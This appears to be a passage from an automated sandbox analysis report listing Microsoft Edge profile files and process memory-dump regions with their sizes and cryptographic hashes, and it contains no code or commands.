                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        144B

                                                                        MD5

                                                                        a0f8d2413a8ce4548c187596520154ba

                                                                        SHA1

                                                                        b7570f3096855aa116fe404c52f0196063e1c13f

                                                                        SHA256

                                                                        56817565f7c14d7d4d8e96ac1b8d6fe0a6be63a51610e487463023afad7f2dae

                                                                        SHA512

                                                                        adca41825bfea58e0463d062e6da0672768f298184bf6b5a4e12a1fd6433ac7d2a1cd311f90702dd814aa384e406c2376895a12b22c0de557aa749ac5da6563d

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        b47bb07fdb0ae270841e2e368ea760e2

                                                                        SHA1

                                                                        a85f4c32efc1b1d44283173467b3e0708ea5799c

                                                                        SHA256

                                                                        f2c2ffe97f99033de2c611382570ad9a9556fb79b8f3791d2102a3dd6a2a7905

                                                                        SHA512

                                                                        dcdc4f2c983f919818660e843d9fabcceafc6a11856e5af86bc7e9b891569a2b48a0f69c4298b166e7f709ea17a17fc9ecb49fa575802d79e98ccfa9fd9522a2

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        e38523be7796b37af11d8d4fb7492277

                                                                        SHA1

                                                                        3ab1d5c81880b34c6eea189e9616545e71070c0a

                                                                        SHA256

                                                                        11c3f3c8213e52d5543866cbda529317e84358eaba9afae46d2f0ecd5afa7fd9

                                                                        SHA512

                                                                        c89cd041325785d5d485d6ce2704a86955a648b582ae3b15d8b04d13683a3f9e779aba77ca879093c09aae7ed1765725fbca9dfe1f2caafb3c7a6a81c3de9cae

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                        Filesize

                                                                        930B

                                                                        MD5

                                                                        328a2eacef12b678ca1a5a867905a460

                                                                        SHA1

                                                                        790aa73ee586f299033879d7e98b41b4ccc7a061

                                                                        SHA256

                                                                        4fee825a0141e2ba5d30d61b98e597a89d833dac57a5980d8916087f5c3901c6

                                                                        SHA512

                                                                        5d68ba13d6a43896f8f6a73213d9740d8ab5a51c349874bb50bfa30121c2389a821f70e0be2ba3cd6d9846002613a2517253d8ff99b085315aaff00552fb3c1b

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        f417a012dc2d712b1d861f38c0b942d2

                                                                        SHA1

                                                                        6f3a2b5e0a8dcd0b0fe499e3e8575be7cf86ced2

                                                                        SHA256

                                                                        d56f5c603cea1caf2b09d4cd01a7ddcd3f17d0b7221f35a85de9bc3ffb277efc

                                                                        SHA512

                                                                        c5dcca03c115d83b3bdb47452f23244ea61e435da9e4a0e1a3a7f057c4485945f19ca48b508e730b40b536406cdad6a08ccd16fd3fb92c45714c9ff256c6ce27

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        9ae602e0d88c4c46d2f225f28a368d2b

                                                                        SHA1

                                                                        902f6185ce166a68f9a7b7b0630bdd6a069d7d7e

                                                                        SHA256

                                                                        8e04d1e896452747e36b8a8cbb4a128bb03342f384f63eb644d11fa54d18a199

                                                                        SHA512

                                                                        c758fd21917fd9df9cdf1fbeb1c50a2acf07f2cffef04746a8c631154b1ec72a3888fd1cd8b36c89bbdbffecf6aca172cb79d76722b71d7fac5b4c77e9c667e9

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        8aa7ad149ca8a3bbabb4b273651cafc9

                                                                        SHA1

                                                                        0d25ac7791c0e7366192fdec601368c800ab3df4

                                                                        SHA256

                                                                        be2f91f5841c42fd8fcf014ebd4c2dfb3aaf53afdef46262364eba8beeff6b3b

                                                                        SHA512

                                                                        c3a1a71071430d19cc88f2aef3e10935fc1a353246bdc63368c18dee7db65cf61e8025afea3ac082c25c8a2b89486ca28e2068ac5aaa20c8582c76307c6b76a9

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        42d6f768afff71c0e721993dc1ed7426

                                                                        SHA1

                                                                        5a6ca00ee0702f4c027d6c27cf479ea667294bcd

                                                                        SHA256

                                                                        45a343eebd6e79c0bf15dcb2727461fb3b64af2aacbef0cb9c43cff9ed0f567e

                                                                        SHA512

                                                                        6d675968545d0566d78b35299a3d32bf217dc639bc9f372812466c7b0e4b9af1c996506af2e2f8631b6adc0533a293b365dc225460ced1e8debfd199c2b87ab0

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        063cd17c7e3f725f50afae01baec9c76

                                                                        SHA1

                                                                        024d189bd5a62c2a8df75c5a45e4301497baa1ff

                                                                        SHA256

                                                                        c281be5704f32b7a20fbf32cbc7ad4cbc1bebe6d065a58eefb91c19735ef78c5

                                                                        SHA512

                                                                        aa5e4c03651fcc7ea76ebc6a7836e0f826dfb2616cee4d1a4d90f16bcb65ef98f76528495fd1ff626f815a52c25d443e54c6026bc099f7cb7630dfb674ae8e86

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        b5881148fc04f11d6f4e64301ab44e4b

                                                                        SHA1

                                                                        6db5d471559028644e69b1aa4ca2299ad78a7bf6

                                                                        SHA256

                                                                        39970482ce82d09d8f21aba6c5404a505b3df144eeec6f9cceb0e42ec6ffacf3

                                                                        SHA512

                                                                        ed27874c7629af09984ac03b1e2134bdee2d865b82843030710a78be383ab8a8a22bcf4361226c1982b71db4ab6df97d61691ecfd1452b89779cfae58951242c

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        2bee417eaea4ff970d798cf32c8c71e8

                                                                        SHA1

                                                                        7de09fe6ba4e6614fda26cd133126d8cbd79a0d4

                                                                        SHA256

                                                                        97754942833a0d059b95e14821c741fc19dab36a3f569e0208b8cd4cfaa8542f

                                                                        SHA512

                                                                        f0ffb6f18ed551fb5a4f30778a7a84fc0ea3ceb9029fed7ec0b97e63ac7593207e342dec93e397b5764be1347d4678e152de6812c4faa0b37ed6f424f0ce448a

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        916b8ddfdf680906440827e4c3df2ce0

                                                                        SHA1

                                                                        a7061d16ef1cb90f4851eaf7c14cde43e3f08bbe

                                                                        SHA256

                                                                        b05a3d3259dfe9276049a20d62bab719b674eafb92e6f47e3713d15e8fb8fe7e

                                                                        SHA512

                                                                        64c9dc3ba2842cf25a1737b5ca10804e70292c507b14094fcc78db7e959bea48ca37b9230c0210c5bc4c473039267320399efcf825c140d08bfdeef5be497676

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        0992166ab9ba7e2e528cd9346a44cb69

                                                                        SHA1

                                                                        90123a01b2e8aed77008407af5c15fd0517ab914

                                                                        SHA256

                                                                        b091312198c20e59948744e5a7bb2da6c88261f20ef8d7e9fcc7eefaa3269f68

                                                                        SHA512

                                                                        3a236b0fb7572294be8d2286587d33c4f9282554a393b8fd30464642360882bbe01fadc768e209448611899afb540c836519f2229167b5b773842330bc7fe6d0

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58f6fd.TMP

                                                                        Filesize

                                                                        538B

                                                                        MD5

                                                                        faa6d4330a6ec7b6f9532810311254ee

                                                                        SHA1

                                                                        e46d14c34538e5fcc7f8c135275aeaa0ae181a51

                                                                        SHA256

                                                                        e3cec1c3a58584da63693f132eea69c6c00e1f7595e85ca6f9042e460179fdfe

                                                                        SHA512

                                                                        0355dc82341b78d5652c50e15ed4b6deb9032562466a9ac90c9dc783c370a3365adf155bab321ed012a61cf1c755da3a359ce6c64c03e57c9bf8d04166c9219f

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                        Filesize

                                                                        16B

                                                                        MD5

                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                        SHA1

                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                        SHA256

                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                        SHA512

                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        bbb88169617b888fed4b08b89ab599ed

                                                                        SHA1

                                                                        c7e73685a9e40365a7aa04a72bca7b16b5b56990

                                                                        SHA256

                                                                        163b7f747050f0e1c16b7f56f44d4afbd1dc923f3b4e0946d90acd0b10f4defb

                                                                        SHA512

                                                                        67ea97702ea69a0804d82ee5a3c9b48ee094798ab8fe09cbc6b1d13db4211c3fc31f2db9d4414d3303bb404c41ba8d798ee38a42a65c081cf0960612983ff177

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        ebea40de5e7e8c18740085f248cee040

                                                                        SHA1

                                                                        c82862f1ff76ed7f035b3e4bfa89017b3efec132

                                                                        SHA256

                                                                        cb02f486746c6454eb564775d597a332fc669519aa5d04a0e88bab94105ddeed

                                                                        SHA512

                                                                        63a0d6b72abaadbc6c762a635b440a03928eb393b6cc9c9f62ae5e6b9e3694e5d757f444b5bc4866b51e16d2149535c0c59fe39872d1bfb2babd8a7468aa2baa

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        d414623597161ee83fd8c4ac9a6d5f3e

                                                                        SHA1

                                                                        d3d9ee6a3c6e7494e6e1cebf7808c8aabb82dcbd

                                                                        SHA256

                                                                        dc690a1171201dfa88186a779e3f28941560bc5a139cba4afe3597123c579c86

                                                                        SHA512

                                                                        e0d0d038db30397dec88ea36381ac95978602b6b0a48e080e2df8cc05b6a3ebebc3cb16c93686c706ec5adf4f5325f9550b58bf64d5c47e93f3c787dbe743ecd

                                                                      • memory/1880-151-0x0000000006AA0000-0x0000000006AB1000-memory.dmp

                                                                        Filesize

                                                                        68KB

                                                                      • memory/1880-158-0x0000000006BE0000-0x0000000006BF3000-memory.dmp

                                                                        Filesize

                                                                        76KB

                                                                      • memory/1880-186-0x0000000006D10000-0x0000000006D4A000-memory.dmp

                                                                        Filesize

                                                                        232KB

                                                                      • memory/1880-183-0x0000000006D10000-0x0000000006D4A000-memory.dmp

                                                                        Filesize

                                                                        232KB

                                                                      • memory/1880-182-0x0000000006C10000-0x0000000006C16000-memory.dmp

                                                                        Filesize

                                                                        24KB

                                                                      • memory/1880-179-0x0000000006C10000-0x0000000006C16000-memory.dmp

                                                                        Filesize

                                                                        24KB

                                                                      • memory/1880-178-0x0000000008E90000-0x0000000008F44000-memory.dmp

                                                                        Filesize

                                                                        720KB

                                                                      • memory/1880-175-0x0000000008E90000-0x0000000008F44000-memory.dmp

                                                                        Filesize

                                                                        720KB

                                                                      • memory/1880-174-0x0000000006C20000-0x0000000006C2C000-memory.dmp

                                                                        Filesize

                                                                        48KB

                                                                      • memory/1880-171-0x0000000006C20000-0x0000000006C2C000-memory.dmp

                                                                        Filesize

                                                                        48KB

                                                                      • memory/1880-166-0x0000000006C60000-0x0000000006C88000-memory.dmp

                                                                        Filesize

                                                                        160KB

                                                                      • memory/1880-162-0x0000000006C30000-0x0000000006C53000-memory.dmp

                                                                        Filesize

                                                                        140KB

                                                                      • memory/1880-159-0x0000000006C30000-0x0000000006C53000-memory.dmp

                                                                        Filesize

                                                                        140KB

                                                                      • memory/1880-187-0x0000000006CF0000-0x0000000006D0F000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/1880-155-0x0000000006BE0000-0x0000000006BF3000-memory.dmp

                                                                        Filesize

                                                                        76KB

                                                                      • memory/1880-190-0x0000000006CF0000-0x0000000006D0F000-memory.dmp

                                                                        Filesize

                                                                        124KB

                                                                      • memory/1880-191-0x0000000006D50000-0x0000000006D65000-memory.dmp

                                                                        Filesize

                                                                        84KB

                                                                      • memory/1880-194-0x0000000006D50000-0x0000000006D65000-memory.dmp

                                                                        Filesize

                                                                        84KB

                                                                      • memory/1880-164-0x0000000006C60000-0x0000000006C88000-memory.dmp

                                                                        Filesize

                                                                        160KB

                                                                      • memory/1880-170-0x0000000006C90000-0x0000000006CA2000-memory.dmp

                                                                        Filesize

                                                                        72KB

                                                                      • memory/1880-167-0x0000000006C90000-0x0000000006CA2000-memory.dmp

                                                                        Filesize

                                                                        72KB

                                                                      • memory/1880-146-0x0000000008FA0000-0x0000000009B89000-memory.dmp

                                                                        Filesize

                                                                        11.9MB

                                                                      • memory/1880-147-0x00000000035B0000-0x00000000035F0000-memory.dmp

                                                                        Filesize

                                                                        256KB

                                                                      • memory/1880-150-0x00000000035B0000-0x00000000035F0000-memory.dmp

                                                                        Filesize

                                                                        256KB

                                                                      • memory/1880-154-0x0000000006AA0000-0x0000000006AB1000-memory.dmp

                                                                        Filesize

                                                                        68KB

                                                                      • memory/1880-143-0x0000000008FA0000-0x0000000009B89000-memory.dmp

                                                                        Filesize

                                                                        11.9MB

                                                                      • memory/1880-142-0x00000000072A0000-0x0000000007C2A000-memory.dmp

                                                                        Filesize

                                                                        9.5MB

                                                                      • memory/1880-139-0x00000000072A0000-0x0000000007C2A000-memory.dmp

                                                                        Filesize

                                                                        9.5MB